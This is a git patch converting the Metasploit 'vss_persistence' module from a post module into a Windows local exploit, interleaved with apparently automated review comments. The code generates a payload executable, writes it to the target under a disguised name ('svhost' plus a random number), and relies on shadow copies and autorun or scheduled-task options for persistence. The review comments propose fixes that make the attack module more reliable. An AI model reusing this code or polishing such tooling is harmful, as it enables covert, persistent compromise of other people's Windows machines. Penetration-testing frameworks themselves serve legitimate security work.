From 0b9cf24103cede3fbd8840717a3d6c5f671e51cb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 15 Oct 2013 11:11:04 -0500 Subject: [PATCH] Convert vss_persistence to Local Exploit --- .../windows/local}/vss_persistence.rb | 26 ++++++++++++------- 1 file changed, 16 insertions(+), 10 deletions(-) rename modules/{post/windows/manage => exploits/windows/local}/vss_persistence.rb (93%) diff --git a/modules/post/windows/manage/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb similarity index 93% rename from modules/post/windows/manage/vss_persistence.rb rename to modules/exploits/windows/local/vss_persistence.rb index 1945275477..e3661578b9 100644 --- a/modules/post/windows/manage/vss_persistence.rb +++ b/modules/exploits/windows/local/vss_persistence.rb @@ -7,14 +7,17 @@ require 'msf/core' require 'rex' +require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Post +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::ShadowCopy include Msf::Post::Windows::Services include Msf::Post::Windows::Registry + include Msf::Exploit::EXE def initialize(info={}) @@ -26,14 +29,17 @@ class Metasploit4 < Msf::Post been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need password in order to start session on the target machine. }, + 'Author' => ['MrXors '], 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], - 'Author' => ['MrXors '], + 'Targets' => [ [ 'Windows 7', {} ] ], + 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ], [ 'URL', 'http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows'] - ] + ], + 'DisclosureDate'=> "Oct 21 2011" )) register_options( 
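Review bot: The added `'DisclosureDate'=> "Oct 21 2011"` entry in the `@@ -26,14 +29,17 @@` hunk does not match the formatting of the hash around it: there is no space before `=>`, and it uses double quotes where every other entry uses single quotes. Write it as `'DisclosureDate' => 'Oct 21 2011'`. The `initialize` body starts before this hunk and continues past it.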
@@ -44,13 +50,11 @@ class Metasploit4 < Msf::Post OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]), OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]), OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\Windows\\\\Temp (DO NOT USE C:\\ in your RPATH!)', ]), - OptPath.new('PATH', [ true, 'Path to Executable on your local system.']) ], self.class) end - def run - path = datastore['PATH'] + def exploit @clean_up = "" print_status("Checking requirements...") @@ -77,8 +81,8 @@ class Metasploit4 < Msf::Post return end - print_status("Uploading #{path}....") - remote_file = upload(path, datastore['RPATH']) + print_status("Uploading payload...") + remote_file = upload(datastore['RPATH']) print_status("Creating Shadow Volume Copy...") unless volume_shadow_copy @@ -117,7 +121,7 @@ class Metasploit4 < Msf::Post end end - def upload(file, trg_loc="") + def upload(trg_loc="") if trg_loc.nil? or trg_loc.empty? location = "\\Windows\\Temp" else @@ -127,8 +131,10 @@ class Metasploit4 < Msf::Post file_name = "svhost#{rand(100)}.exe" file_on_target = "#{location}\\#{file_name}" + exe = generate_payload_exe + begin - upload_file("#{file_on_target}","#{file}") + write_file("#{file_on_target}", exe) rescue ::Rex::Post::Meterpreter::RequestError => e fail_with(Failure::NotFound, e.message) end
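Review bot: `RPATH` is still constrained only by its help text ("DO NOT USE C:\\ in your RPATH!"), and in the `@@ -44,13 +50,11 @@` hunk `exploit` starts work without checking it; the `@@ -77,8 +81,8 @@` hunk then passes `datastore['RPATH']` straight to `upload`. A guard at the top of `exploit`, for example `fail_with(Failure::BadConfig, 'RPATH must not include a drive letter') if datastore['RPATH'].to_s =~ /\A[a-z]:/i`, reports the operator mistake before anything is written to the host. The body of `exploit` continues outside this hunk, so how the drive prefix is applied is inferred from the option text rather than seen.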
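Review bot: `upload(trg_loc="")` in the `@@ -117,7 +121,7 @@` hunk no longer uploads a local file, and the method has no comment saying what it does now. A one-line header such as `# Writes the generated payload EXE into trg_loc (default \Windows\Temp) on the session host.` would make the new contract clear; the return value is not visible in this hunk or the next, so document it once confirmed. Since the body already handles `nil`, the default could be `trg_loc = nil` rather than an empty string. The method continues outside this hunk.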
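Review bot: The result of `generate_payload_exe` goes to `write_file` unchecked in the `@@ -127,8 +131,10 @@` hunk, so if generation yields nothing the module writes a nil or empty file and carries on to the shadow copy step. Adding `fail_with(Failure::Unknown, 'Could not generate the payload EXE') if exe.nil? || exe.empty?` before the `begin` stops it there; whether `generate_payload_exe` can return nil in this framework version is not visible here, so treat this as a precaution. The string interpolation is unnecessary and the call can be `write_file(file_on_target, exe)`. Every `RequestError` is still reported as `Failure::NotFound`, which will mislead when the write fails for a permissions reason. `upload` starts in the previous hunk and its closing `end` is outside this one.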